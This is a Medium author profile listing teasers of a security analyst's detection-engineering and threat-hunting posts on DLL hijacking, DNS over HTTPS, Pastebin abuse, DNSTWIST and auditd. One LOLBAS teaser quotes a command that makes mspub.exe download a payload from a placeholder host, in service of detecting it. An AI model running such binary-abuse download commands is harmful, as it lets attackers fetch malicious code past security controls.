Open in app

Sign in

Write

Sign in

mthcht
mthcht

255 Followers

Home

Lists

About

Published in

Detect FYI

·Pinned

Detect DLL Hijacking techniques from HijackLibs with Splunk

What is DLL Hijacking? DLL Hijacking manipulates a trusted application into executing an unauthorized DLL. Antivirus and EDR solutions may not automatically detect this deceptive activity. Additionally, application whitelisting solutions like AppLocker might not prevent the rogue code from running. Numerous threat actors have been documented using this technique to meet their goals. HijackLibs

Dll Hijacking

6 min read

Detect DLL Hijacking techniques from HijackLibs with Splunk
Detect DLL Hijacking techniques from HijackLibs with Splunk
Dll Hijacking

6 min read


Published in

Detect FYI

·Nov 7

Detecting DNS over HTTPS

What is DNS over HTTPS (DoH) DoH secures DNS queries by encapsulating them within HTTPS traffic, leveraging encryption to mitigate interception and mitm attacks. Initiated by Google and Mozilla, and notably adopted by Firefox at first, DoH has shifted the DNS landscape towards greater privacy. Defined in RFC 8484, DoH uses HTTP/2 or HTTP/3 for transport…

DNS

8 min read

Detecting DNS over HTTPS
Detecting DNS over HTTPS
DNS

8 min read


Published in

Detect FYI

·Nov 3

Threat Hunting - Suspicious TLDs

Understanding the Threat Landscape Top-level domains (TLDs) hold significant influence in the domain name system (DNS) hierarchy and can serve as indicators for threat detection.

Proxy

6 min read

Threat Hunting - Suspicious TLDs
Threat Hunting - Suspicious TLDs
Proxy

6 min read


Published in

OSINT TEAM

·Oct 4

Catching My Hacker via Leaked Databases

This blog post was made in 2016, which I was able to recover through some data carving on old backups I got Hacked In 2009 I was living in France and before the French company ‘Free Mobile’ disrupted the mobile market, we all had to deal with useless and expensive mobile plans. I…

Osint Investigation

8 min read

Catching My Hacker via Leaked Databases
Catching My Hacker via Leaked Databases
Osint Investigation

8 min read


Sep 30

The Myths and Realities of VPNs

Have you also noticed the aggressive advertising campaigns for VPN providers, promoted by social media influencers and YouTube creators ? As a security analyst, it’s incredibly annoying to hear them spread the lies they’re paid to tell their audience, especially when some of them are already aware that they’re spreading lies. This…

Vpn Service Providers

4 min read

The Myths and Realities of VPNs
The Myths and Realities of VPNs
Vpn Service Providers

4 min read


Published in

Detect FYI

·Aug 24

How Threat Actors use Pastebin

Why is it important to monitor paste sites? Pastebin is a doubled-edged sword widely-used text-sharing platform, while it serves legitimate purposes mostly for developers and tech enthusiasts, it has been abused by threat actors for years to look for leaked information, host malwares, exfiltrate data and even used as a C2. …

Paste Bin

3 min read

How Threat Actors use Pastebin
How Threat Actors use Pastebin
Paste Bin

3 min read


Aug 23

LOLBAS Detection Serie [2] — Mspub.exe + ProtocolHandler.exe + MsoHtmEd.exe

The LOLBAS serie : https://medium.com/@mthcht/list/lolbas-843ba9de6810 This time, I’ve selected three LOLbins associated with Microsoft Office. Let’s test and examine each one to determine what we can detect! MSPUB.exe LOL technique for MSPUB.exe Ref LOLBAS: https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mspub/ C_h4ck_0 on twitter found a way to download arbitrary files with MSPUB.exe by using the following command: mspub.exe https://example.com/payload

Lolbas

5 min read

LOLBAS Detection Serie [2] — Mspub.exe + ProtocolHandler.exe + MsoHtmEd.exe
LOLBAS Detection Serie [2] — Mspub.exe + ProtocolHandler.exe + MsoHtmEd.exe
Lolbas

5 min read


Published in

Detect FYI

·Aug 21

LOLBAS Detection Serie [1] - AppInstaller.exe

The LOLBAS serie: https://mthcht.medium.com/list/lolbas-843ba9de6810 What is AppInstaller? AppInstaller is an utility that allows the installation of APPX and MSIX packages, leveraged by numerous software editors and playing a key role in software management. What is LOLBAS ? Living Off The Land Binaries and Scripts The goal of the LOLBAS project is to document every binary, script, and…

Threat Hunting

6 min read

LOLBAS Detection Serie [1] - AppInstaller.exe
LOLBAS Detection Serie [1] - AppInstaller.exe
Threat Hunting

6 min read


Published in

Detect FYI

·Aug 15

Detecting Phishing attempts with DNSTWIST

DNSTWIST for SOC & CTI DNSTWIST Dnstwist is a tool designed to identify domains that might be used in phishing attacks or other malicious activities by generating a comprehensive list of variations on a given domain using the following techniques: Addition: Adds characters to the domain name. Bitsquatting: Uses bit errors to generate similar-looking domain names. …

Threat Hunting

12 min read

Detecting Phishing attempts with DNSTWIST
Detecting Phishing attempts with DNSTWIST
Threat Hunting

12 min read


Published in

Detect FYI

·Aug 11

File Integrity Monitoring with Auditd

FIM ? PCI DSS ? File Integrity Monitoring (FIM) is a security process that involves the regular monitoring and detection of changes in files, including system files, configurations, and content files. It is crucial in ensuring that files have not been tampered with, corrupted, or otherwise altered in an unauthorized manner. Payment Card Industry Data…

Threat Hunting

19 min read

File Integrity Monitoring with Auditd
File Integrity Monitoring with Auditd
Threat Hunting

19 min read

mthcht

mthcht

255 Followers

Threat Hunting - DFIR - Detection Engineering https://twitter.com/mthcht

Following
  • Simone Kraus

    Simone Kraus

  • Anton Chuvakin

    Anton Chuvakin

  • Root ♊

    Root ♊

  • Michael Koczwara

    Michael Koczwara

  • Nasreddine Bencherchali

    Nasreddine Bencherchali

See all (40)

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams